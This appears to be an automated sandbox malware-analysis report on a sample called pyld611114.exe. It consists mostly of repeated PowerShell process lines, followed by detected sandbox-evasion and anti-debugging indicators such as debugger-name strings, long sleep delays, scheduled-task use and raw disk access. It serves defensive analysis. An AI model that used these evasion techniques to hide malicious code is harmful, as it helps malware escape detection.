Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @X64DBG.EXE
Source: console_zero.exe, 0000002D.00000003.2558603205.000001D7ED370000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559283359.000001D7ED37D000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559967746.000001D7ED3B7000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559433335.000001D7ED385000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2560599446.000001D7ED3D5000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2562659316.000001D7ED3E3000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2558687370.000001D7ED377000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2561890551.000001D7ED3DC000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559719592.000001D7ED39A000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2558258022.000001D7ED35D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TTTRACER.DLLT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 6000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7745Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1704Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8019Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1445Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7812Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1822Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3363
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6802
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6367
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3303
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows\System32\svchost.exeAPI coverage: 1.3 %
Source: C:\Windows\System32\console_zero.exeAPI coverage: 1.8 %
Source: C:\Windows\System32\crypti.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\crypti.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 7745 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 1704 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\timeout.exe TID: 2536Thread sleep count: 87 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep count: 8019 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608Thread sleep count: 1445 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7368Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep count: 7812 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep count: 1822 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6848Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7896Thread sleep count: 88 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 6669 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5128Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep count: 2949 > 30
Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -30000000s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 5824Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep count: 6228 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 3363 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 1468Thread sleep count: 83 > 30
Source: C:\Windows\System32\console_zero.exe TID: 3200Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 6802 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 2870 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084Thread sleep count: 6367 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep count: 3303 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeCode function: 42_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h42_2_64946F50
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA20144 FindClose,FindFirstFileExW,GetLastError,45_2_00007FF71FA20144
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA33764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_00007FF71FA33764
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA201B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,45_2_00007FF71FA201B8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,76_2_00007FF60CCCD568
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,83_2_00007FF7D6EFD568
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 6000000
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000013.00000002.3451122928.000001F6D3654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3449238654.000001F6CDE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 0000002A.00000002.3449493964.00000266EA42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\pyld611114.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Found API chain indicative of debugger detection
Source: C:\Windows\System32\console_zero.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\svchost.exeCode function: 42_2_649461C0 IsDebuggerPresent,RaiseException,42_2_649461C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA377B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,42_2_00007FFDA377B470
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA349D0 GetProcessHeap,45_2_00007FF71FA349D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
